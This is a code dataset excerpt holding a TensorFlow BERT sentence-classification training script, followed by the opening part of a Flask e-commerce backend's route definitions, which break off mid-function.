\"\"\"Processor for the classification data set.\"\"\"\n def __init__(self,\n data_dir,\n task_name):\n self.data_dir = data_dir\n self.task_name = task_name\n \n def get_train_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"\n data_path = os.path.join(self.data_dir, \"train-{0}\".format(self.task_name), \"train-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_dev_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\"\n data_path = os.path.join(self.data_dir, \"dev-{0}\".format(self.task_name), \"dev-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_test_examples(self):\n \"\"\"Gets a collection of `InputExample`s for the test set.\"\"\"\n data_path = os.path.join(self.data_dir, \"test-{0}\".format(self.task_name), \"test-{0}.json\".format(self.task_name))\n data_list = self._read_json(data_path)\n example_list = self._get_example(data_list)\n return example_list\n \n def get_sent_labels(self):\n \"\"\"Gets the list of sentence labels for this data set.\"\"\"\n data_path = os.path.join(self.data_dir, \"resource\", \"sent_label.vocab\")\n sent_labels = self._read_text(data_path)\n return sent_labels\n \n def _read_text(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"rb\") as file:\n data_list = []\n for line in file:\n data_list.append(line.decode(\"utf-8\").strip())\n\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _read_json(self,\n data_path):\n if os.path.exists(data_path):\n with open(data_path, \"r\") as file:\n data_list = json.load(file)\n return data_list\n else:\n raise FileNotFoundError(\"data path not found\")\n \n def _get_example(self,\n data_list):\n example_list = []\n for data in data_list:\n guid = data[\"id\"]\n text = tokenization.convert_to_unicode(data[\"text\"])\n sent_label = tokenization.convert_to_unicode(data[\"sent_label\"])\n example = InputExample(guid=guid, text=text, sent_label=sent_label)\n example_list.append(example)\n \n return example_list\n\ndef convert_single_example(ex_index,\n example,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Converts a single `InputExample` into a single `InputFeatures`.\"\"\"\n if isinstance(example, PaddingInputExample):\n return InputFeatures(\n input_ids=[0] * max_seq_length,\n input_masks=[0] * max_seq_length,\n segment_ids=[0] * max_seq_length,\n sent_label_id=0)\n \n sent_label_map = {}\n for (i, sent_label) in enumerate(sent_label_list):\n sent_label_map[sent_label] = i\n \n tokens = tokenizer.tokenize(example.text)\n \n if len(tokens) > max_seq_length - 2:\n tokens = tokens[0:(max_seq_length - 2)]\n \n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambiguously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n \n input_tokens = []\n segment_ids = []\n sent_label_id = sent_label_map[example.sent_label]\n \n input_tokens.append(\"[CLS]\")\n segment_ids.append(0)\n \n for token in tokens:\n input_tokens.append(token)\n segment_ids.append(0)\n \n input_tokens.append(\"[SEP]\")\n segment_ids.append(0)\n \n input_ids = tokenizer.convert_tokens_to_ids(input_tokens)\n \n # The mask has 1 for real tokens and 0 for padding tokens. Only real tokens are attended to.\n input_masks = [1] * len(input_ids)\n \n # Zero-pad up to the sequence length.\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_masks.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == max_seq_length\n assert len(input_masks) == max_seq_length\n assert len(segment_ids) == max_seq_length\n \n if ex_index < 5:\n tf.logging.info(\"*** Example ***\")\n tf.logging.info(\"guid: %s\" % (example.guid))\n tf.logging.info(\"tokens: %s\" % \" \".join([tokenization.printable_text(x) for x in tokens]))\n tf.logging.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n tf.logging.info(\"input_masks: %s\" % \" \".join([str(x) for x in input_masks]))\n tf.logging.info(\"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n tf.logging.info(\"sent_label_id: %s\" % str(sent_label_id))\n\n feature = InputFeatures(\n input_ids=input_ids,\n input_masks=input_masks,\n segment_ids=segment_ids,\n sent_label_id=sent_label_id)\n return feature\n\ndef convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer):\n \"\"\"Convert a set of `InputExample`s to a list of `InputFeatures`.\"\"\"\n features = []\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n features.append(feature)\n \n return features\n\ndef input_fn_builder(features,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n all_input_ids = []\n all_input_masks = []\n all_segment_ids = []\n all_sent_label_ids = []\n \n for feature in features:\n all_input_ids.append(feature.input_ids)\n all_input_masks.append(feature.input_masks)\n all_segment_ids.append(feature.segment_ids)\n all_sent_label_ids.append(feature.sent_label_id)\n \n def input_fn(params):\n batch_size = params[\"batch_size\"]\n num_examples = len(features)\n\n # This is for demo purposes and does NOT scale to large data sets. We do\n # not use Dataset.from_generator() because that uses tf.py_func which is\n # not TPU compatible. The right way to load data is with TFRecordReader.\n d = tf.data.Dataset.from_tensor_slices({\n \"input_ids\": tf.constant(all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"input_masks\": tf.constant(all_input_masks, shape=[num_examples, seq_length], dtype=tf.int32),\n \"segment_ids\": tf.constant(all_segment_ids, shape=[num_examples, seq_length], dtype=tf.int32),\n \"sent_label_ids\": tf.constant(all_sent_label_ids, shape=[num_examples], dtype=tf.int32),\n })\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.batch(batch_size=batch_size, drop_remainder=drop_remainder)\n return d\n \n return input_fn\n\ndef file_based_convert_examples_to_features(examples,\n sent_label_list,\n max_seq_length,\n tokenizer,\n output_file):\n \"\"\"Convert a set of `InputExample`s to a TFRecord file.\"\"\"\n def create_int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n \n writer = tf.python_io.TFRecordWriter(output_file)\n \n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n \n feature = convert_single_example(ex_index, example, sent_label_list, max_seq_length, tokenizer)\n \n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_masks\"] = create_int_feature(feature.input_masks)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"sent_label_ids\"] = create_int_feature([feature.sent_label_id])\n \n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n \n writer.write(tf_example.SerializeToString())\n \n writer.close()\n\ndef file_based_input_fn_builder(input_file,\n seq_length,\n is_training,\n drop_remainder):\n \"\"\"Creates an `input_fn` closure to be passed to TPUEstimator.\"\"\"\n name_to_features = {\n \"input_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"input_masks\": tf.FixedLenFeature([seq_length], tf.int64),\n \"segment_ids\": tf.FixedLenFeature([seq_length], tf.int64),\n \"sent_label_ids\": tf.FixedLenFeature([], tf.int64),\n }\n \n def _decode_record(record,\n name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n example = tf.parse_single_example(record, name_to_features)\n \n # tf.Example only supports tf.int64, but the TPU only supports tf.int32. So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n \n return example\n \n def input_fn(params):\n \"\"\"The actual input function.\"\"\"\n batch_size = params[\"batch_size\"]\n \n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n d = tf.data.TFRecordDataset(input_file)\n \n if is_training:\n d = d.repeat()\n d = d.shuffle(buffer_size=100, seed=np.random.randint(10000))\n \n d = d.apply(tf.contrib.data.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n batch_size=batch_size,\n drop_remainder=drop_remainder))\n \n return d\n \n return input_fn\n\ndef create_model(bert_config,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_ids,\n sent_label_list,\n mode,\n use_tpu):\n \"\"\"Creates a Classifier model.\"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_masks,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_tpu)\n \n # If you want to use sentence-level output, use model.get_pooled_output()\n # If you want to use token-level output, use model.get_sequence_output()\n with tf.variable_scope(\"sent\", reuse=tf.AUTO_REUSE):\n sent_result = model.get_pooled_output()\n sent_result_mask = tf.cast(tf.reduce_max(input_masks, axis=-1, keepdims=True), dtype=tf.float32)\n \n sent_kernel_initializer = tf.glorot_uniform_initializer(seed=np.random.randint(10000), dtype=tf.float32)\n sent_bias_initializer = tf.zeros_initializer\n sent_dense_layer = tf.keras.layers.Dense(units=len(sent_label_list), activation=None, use_bias=True,\n kernel_initializer=sent_kernel_initializer, bias_initializer=sent_bias_initializer,\n kernel_regularizer=None, bias_regularizer=None, trainable=True)\n \n sent_dropout_layer = tf.keras.layers.Dropout(rate=0.1, seed=np.random.randint(10000))\n \n sent_result = sent_dense_layer(sent_result)\n if mode == tf.estimator.ModeKeys.TRAIN:\n sent_result = sent_dropout_layer(sent_result)\n \n masked_sent_predict = sent_result * sent_result_mask + MIN_FLOAT * (1 - sent_result_mask)\n sent_predict_probs = tf.nn.softmax(masked_sent_predict, axis=-1)\n sent_predict_ids = tf.cast(tf.argmax(sent_predict_probs, axis=-1), dtype=tf.int32)\n sent_predict_scores = tf.reduce_max(sent_predict_probs, axis=-1)\n \n loss = tf.constant(0.0, dtype=tf.float32)\n if mode not in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL]:\n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n \n if sent_label_ids is not None:\n with tf.variable_scope(\"sent_loss\", reuse=tf.AUTO_REUSE):\n sent_label = tf.cast(sent_label_ids, dtype=tf.float32)\n sent_label_mask = tf.cast(tf.reduce_max(input_masks, axis=-1), dtype=tf.float32)\n masked_sent_label = tf.cast(sent_label * sent_label_mask, dtype=tf.int32)\n sent_cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=masked_sent_label, logits=masked_sent_predict)\n sent_loss = tf.reduce_sum(sent_cross_entropy * sent_label_mask) / tf.reduce_sum(tf.reduce_max(sent_label_mask, axis=-1))\n loss = loss + sent_loss\n \n return loss, sent_predict_ids, sent_predict_scores, sent_predict_probs\n\ndef model_fn_builder(bert_config,\n sent_label_list,\n init_checkpoint,\n learning_rate,\n num_train_steps,\n num_warmup_steps,\n use_tpu):\n \"\"\"Returns `model_fn` closure for TPUEstimator.\"\"\"\n def model_fn(features,\n labels,\n mode,\n params): # pylint: disable=unused-argument\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n \n input_ids = features[\"input_ids\"]\n input_masks = features[\"input_masks\"]\n segment_ids = features[\"segment_ids\"]\n sent_label_ids = features[\"sent_label_ids\"] if mode in [tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL] else None\n \n loss, sent_predict_ids, sent_predict_scores, sent_predict_probs = create_model(bert_config,\n input_ids, input_masks, segment_ids, sent_label_ids, sent_label_list, mode, use_tpu)\n \n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n scaffold_fn = None\n \n if init_checkpoint:\n assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n \n if use_tpu:\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n \n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n \n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n \n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape, init_string)\n \n output_spec = None \n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n elif mode == tf.estimator.ModeKeys.EVAL:\n def metric_fn(sent_label_ids,\n sent_predict_ids):\n sent_accuracy = tf.metrics.accuracy(labels=sent_label_ids, predictions=sent_predict_ids)\n \n metric = {\n \"sent_accuracy\": sent_accuracy,\n }\n \n return metric\n \n eval_metrics = (metric_fn, [sent_label_ids, sent_predict_ids])\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n loss=loss,\n eval_metrics=eval_metrics,\n scaffold_fn=scaffold_fn)\n else:\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(\n mode=mode,\n predictions={\n \"sent_predict_id\": sent_predict_ids,\n \"sent_predict_score\": sent_predict_scores,\n \"sent_predict_prob\": sent_predict_probs\n },\n scaffold_fn=scaffold_fn)\n \n return output_spec\n \n return model_fn\n\ndef get_masked_data(data_ids,\n label_list):\n label_map = {}\n for (i, label) in enumerate(label_list):\n label_map[label] = i\n\n pad_id = tf.constant(label_map[\"[PAD]\"], shape=[], dtype=tf.int32)\n out_id = tf.constant(label_map[\"O\"], shape=[], dtype=tf.int32)\n x_id = tf.constant(label_map[\"X\"], shape=[], dtype=tf.int32)\n cls_id = tf.constant(label_map[\"[CLS]\"], shape=[], dtype=tf.int32)\n sep_id = tf.constant(label_map[\"[SEP]\"], shape=[], dtype=tf.int32)\n\n masked_data_ids = (tf.cast(tf.not_equal(data_ids, pad_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, out_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, x_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, cls_id), dtype=tf.int32) *\n tf.cast(tf.not_equal(data_ids, sep_id), dtype=tf.int32))\n \n return masked_data_ids\n\ndef serving_input_fn():\n with tf.variable_scope(\"export\"):\n features = {\n 'input_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_ids'),\n 'input_masks': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='input_masks'),\n 'segment_ids': tf.placeholder(tf.int32, [None, FLAGS.max_seq_length], name='segment_ids')\n }\n \n return tf.estimator.export.build_raw_serving_input_receiver_fn(features)()\n\ndef decode_predicts(predicts,\n sent_label_list,\n max_seq_length,\n tokenizer):\n decoded_predicts = []\n for predict in predicts:\n input_tokens = tokenizer.convert_ids_to_tokens(predict[\"input_ids\"])\n input_masks = predict[\"input_masks\"]\n \n decoded_tokens = []\n for input_token, input_mask in zip(input_tokens, input_masks):\n if input_mask == 0:\n break\n \n if input_token in [\"[CLS]\", \"[SEP]\"]:\n continue\n \n if input_token[:2] == \"##\":\n decoded_tokens[-1] = decoded_tokens[-1] + input_token[2:]\n continue\n \n decoded_tokens.append(input_token)\n \n decoded_predict = {\n \"text\": \" \".join(decoded_tokens),\n \"sent_label\": sent_label_list[predict[\"sent_label_id\"]],\n \"sent_predict\": sent_label_list[predict[\"sent_predict_id\"]],\n \"sent_score\": float(predict[\"sent_predict_score\"]),\n \"sent_probs\": [float(prob) for prob in predict[\"sent_predict_prob\"]]\n }\n \n decoded_predicts.append(decoded_predict)\n \n return decoded_predicts\n\ndef write_to_json(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file: \n json.dump(data_list, file, indent=4)\n\ndef write_to_text(data_list,\n data_path):\n data_folder = os.path.dirname(data_path)\n if not os.path.exists(data_folder):\n os.mkdir(data_folder)\n \n with open(data_path, \"w\") as file:\n for data in data_list:\n file.write(\"{0}\\n\".format(data))\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n \n np.random.seed(FLAGS.random_seed)\n \n bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)\n \n if FLAGS.max_seq_length > bert_config.max_position_embeddings:\n raise ValueError(\"Cannot use sequence length %d because the BERT model was only trained up to sequence length %d\" %\n (FLAGS.max_seq_length, bert_config.max_position_embeddings))\n \n tf.gfile.MakeDirs(FLAGS.output_dir)\n \n tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case, FLAGS.init_checkpoint)\n tokenizer = tokenization.FullTokenizer(vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)\n \n data_dir = FLAGS.data_dir\n task_name = FLAGS.task_name.lower()\n processor = ClassificationProcessor(data_dir, task_name)\n sent_label_list = processor.get_sent_labels()\n \n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n if FLAGS.do_train:\n train_examples = processor.get_train_examples()\n num_train_steps = int(len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)\n num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)\n \n tpu_cluster_resolver = None\n if FLAGS.use_tpu and FLAGS.tpu_name:\n tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(\n FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)\n \n is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2\n run_config = tf.contrib.tpu.RunConfig(\n cluster=tpu_cluster_resolver,\n master=FLAGS.master,\n model_dir=FLAGS.output_dir,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n tpu_config=tf.contrib.tpu.TPUConfig(\n iterations_per_loop=FLAGS.iterations_per_loop,\n num_shards=FLAGS.num_tpu_cores,\n per_host_input_for_training=is_per_host))\n \n model_fn = model_fn_builder(\n bert_config=bert_config,\n sent_label_list=sent_label_list,\n init_checkpoint=FLAGS.init_checkpoint,\n learning_rate=FLAGS.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_tpu=FLAGS.use_tpu)\n \n # If TPU is not available, this will fall back to normal Estimator on CPU or GPU.\n estimator = tf.contrib.tpu.TPUEstimator(\n use_tpu=FLAGS.use_tpu,\n model_fn=model_fn,\n config=run_config,\n export_to_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.train_batch_size,\n eval_batch_size=FLAGS.eval_batch_size,\n predict_batch_size=FLAGS.predict_batch_size)\n \n if FLAGS.do_train:\n tf.logging.info(\"***** Run training *****\")\n tf.logging.info(\" Num examples = %d\", len(train_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.train_batch_size)\n tf.logging.info(\" Num steps = %d\", num_train_steps)\n \n train_features = convert_examples_to_features(\n examples=train_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n train_input_fn = input_fn_builder(\n features=train_features,\n seq_length=FLAGS.max_seq_length,\n is_training=True,\n drop_remainder=True)\n \n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n \n if FLAGS.do_eval:\n eval_examples = processor.get_dev_examples()\n tf.logging.info(\"***** Run evaluation *****\")\n tf.logging.info(\" Num examples = %d\", len(eval_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.eval_batch_size)\n \n eval_features = convert_examples_to_features(\n examples=eval_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n eval_input_fn = input_fn_builder(\n features=eval_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.evaluate(input_fn=eval_input_fn)\n \n sent_accuracy = result[\"sent_accuracy\"]\n \n tf.logging.info(\"***** Evaluation result *****\")\n tf.logging.info(\" Accuracy (sent-level) = %s\", str(sent_accuracy))\n \n if FLAGS.do_predict:\n predict_examples = processor.get_test_examples()\n tf.logging.info(\"***** Run prediction *****\")\n tf.logging.info(\" Num examples = %d\", len(predict_examples))\n tf.logging.info(\" Batch size = %d\", FLAGS.predict_batch_size)\n \n predict_features = convert_examples_to_features(\n examples=predict_examples,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n\n predict_input_fn = input_fn_builder(\n features=predict_features,\n seq_length=FLAGS.max_seq_length,\n is_training=False,\n drop_remainder=False)\n \n result = estimator.predict(input_fn=predict_input_fn)\n \n predicts = [{\n \"input_ids\": feature.input_ids,\n \"input_masks\": feature.input_masks,\n \"sent_label_id\": feature.sent_label_id,\n \"sent_predict_id\": predict[\"sent_predict_id\"],\n \"sent_predict_score\": predict[\"sent_predict_score\"],\n \"sent_predict_prob\": predict[\"sent_predict_prob\"].tolist()\n } for feature, predict in zip(predict_features, result)]\n \n decoded_predicts = decode_predicts(\n predicts=predicts,\n sent_label_list=sent_label_list,\n max_seq_length=FLAGS.max_seq_length,\n tokenizer=tokenizer)\n \n predict_tag = FLAGS.predict_tag if FLAGS.predict_tag else str(time.time())\n output_path = os.path.join(FLAGS.output_dir, \"predict.{0}.json\".format(predict_tag))\n write_to_json(decoded_predicts, output_path)\n \n if FLAGS.do_export:\n tf.logging.info(\"***** Running exporting *****\")\n tf.gfile.MakeDirs(FLAGS.export_dir)\n estimator.export_savedmodel(FLAGS.export_dir, serving_input_fn, as_text=False)\n\nif __name__ == \"__main__\":\n flags.mark_flag_as_required(\"bert_config_file\")\n flags.mark_flag_as_required(\"vocab_file\")\n flags.mark_flag_as_required(\"init_checkpoint\")\n flags.mark_flag_as_required(\"data_dir\")\n flags.mark_flag_as_required(\"output_dir\")\n flags.mark_flag_as_required(\"export_dir\")\n tf.app.run()\n","sub_path":"run_classifier.py","file_name":"run_classifier.py","file_ext":"py","file_size_in_byte":32859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"402705504","text":"from json import dumps\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom auth import *\nfrom app import *\nfrom auth_admin import *\nfrom product import *\nfrom user_function import *\nfrom purchase import *\nfrom cart import *\nfrom recommend import *\nfrom search import *\nfrom chat import *\n#----------------------------------------------user login-------------------------------\n@app.route('/login', methods=['POST'])\ndef flask_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = user_login(email, password)\n return dumps(l)\n\n\n@app.route('/register', methods=['POST'])\ndef flask_register():\n j = request.json\n email = j['email']\n password = j['password']\n name = j['name']\n l = user_register(email, password, name)\n return dumps(l)\n\n\n@app.route('/logout', methods=['POST'])\ndef flask_logout():\n j = request.json\n t = j['token']\n l = user_logout(t)\n return dumps(l)\n\n#----------------------------------------------admin login-------------------------------\n@app.route('/admin_login', methods=['POST'])\ndef flask_admin_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = admin_login(email, password)\n return dumps(l)\n\n@app.route('/admin_logout', methods=['POST'])\ndef flask_admin_logout():\n j = request.json\n token = j['Admin']\n l = admin_logout(token)\n return dumps(l)\n\n@app.route('/admin_product', methods=['GET'])\ndef flask_admin_product():\n token = request.headers.get('Admin',None)\n l = admin_product(token)\n return dumps(l)\n\n@app.route('/admin_order', methods=['GET'])\ndef flask_admin_order():\n token = request.headers.get('Admin',None)\n l = admin_order(token)\n return dumps(l)\n\n\n@app.route('/admin_get_order', methods=['GET'])\ndef flask_admin_get_order():\n token = request.headers.get('Admin',None)\n index = request.headers.get('index',None)\n l=admin_get_order(token,index)\n return dumps(l)\n\n#----------------------------------------------product-------------------------------\n\n \n@app.route('/add_product', methods=['POST'])\ndef flask_add_product():\n j = request.json\n token = request.headers.get('Admin',None)\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = add_product(token,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n@app.route('/delete_product/', methods=['PUT'])\ndef flask_delete_product(id):\n id=int(id)\n token = request.headers.get('Authorization',None)\n l=delete_product(token,id)\n return dumps(l)\n\n@app.route('/update_information', methods=['POST'])\ndef flask_update_information():\n j = request.json\n token = request.headers.get('Admin',None)\n id=j['id']\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = update_information(token,id,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n\n@app.route('/change_detail', methods=['PUT'])\ndef flask_change_detail():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n detail = j['detail']\n l = chang_detail(token, id, detail)\n return dumps(l)\n\n@app.route('/add_tag', methods=['PUT'])\ndef flask_add_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = add_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_tag', methods=['PUT'])\ndef flask_change_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = change_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_status', methods=['PUT'])\ndef flask_change_status():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n status = j['status']\n l = change_status(token, id, status)\n return dumps(l)\n\n@app.route('/change_stock', methods=['PUT'])\ndef flask_change_stock():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n stock= j['stock']\n l = change_stock(token, id, stock)\n return dumps(l)\n\n@app.route('/change_price', methods=['PUT'])\ndef flask_change_price():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n price = j['price']\n l = change_stock(token, id, price)\n return dumps(l)\n\n@app.route('/get_product/', methods=['GET'])\ndef flask_get_product(category):\n return dumps(get_by_category(category))\n\n@app.route('/get_number/', methods=['GET'])\ndef flask_get_number(category):\n return dumps(get_number_by_category(category))\n\n@app.route('/get_one_product/', methods=['GET'])\ndef flask_get_one_product(id):\n id=int(id)\n return dumps(get_one_product(id))\n\n\n@app.route('/update_first_photo', methods=['PUT'])\ndef flask_update_first_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_first_photo(photo))\n\n@app.route('/update_second_photo', methods=['PUT'])\ndef flask_update_second_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_second_photo(photo))\n#----------------------------------------------user function-------------------------------\n\n@app.route('/change_password', methods=['PUT'])\ndef flask_change_password():\n j = request.json\n token = request.headers.get('Authorization',None)\n password = j['password']\n current_password = j['current_password']\n l = change_password(token,current_password, password)\n return dumps(l)\n\n\n@app.route('/change_name', methods=['PUT'])\ndef flask_change_name():\n j = request.json\n token = request.headers.get('Authorization',None)\n name = j['name']\n l = change_name(token,name)\n return dumps(l)\n\n\n#----------------------------------------------purchase-------------------------------\n\n\n@app.route('/purchase_product', methods=['POST'])\ndef flask_purchase_product():\n token = request.headers.get('Authorization',None)\n l = purchase_product(token)\n return dumps(l)\n\n@app.route('/review_By_time', methods=['POST'])\ndef flask_review_By_time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = review_By_time(token,day)\n return dumps(l)\n\n@app.route('/get_cost_By_Time', methods=['POST'])\ndef flask_get_cost_By_Time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = get_cost_By_Time(token,day)\n return dumps(l)\n\n@app.route('/get_record', methods=['GET'])\ndef flask_get_record():\n token = request.headers.get('Authorization',None)\n l = get_record(token)\n return dumps(l)\n#----------------------------------------------cart-------------------------------\n\n@app.route('/add_product_to_cart/', methods=['GET'])\ndef flask_add_product_to_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = add_product_to_cart(token,id)\n return dumps(l)\n\n@app.route('/remove_product_from_cart/', methods=['DELETE'])\ndef flask_remove_product_from_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = remove_product_from_cart(token,id)\n return dumps(l)\n\n@app.route('/get_cart', methods=['GET'])\ndef flask_get_cart():\n token = request.headers.get('Authorization',None)\n l = get_cart(token)\n return dumps(l)\n\n\n\n#----------------------------------------------recommend-------------------------------\n\n@app.route('/random_recommend', methods=['GET'])\ndef flask_random_recommend():\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=random_recommendation(number) # return 10 product\n return dumps(l)\n\n@app.route('/product_recommendation/', methods=['GET'])\ndef flask_product_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=product_recommendation(id,number) # return 10 product\n return dumps(l)\n\n\n@app.route('/buy_recommendation/', methods=['GET'])\ndef flask_buy_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=buy_recommendation(id,number) # return 10 product\n return dumps(l)\n\n@app.route('/purchase_record_recommendation', methods=['GET'])\ndef flask_purchase_record_recommendation():\n token = 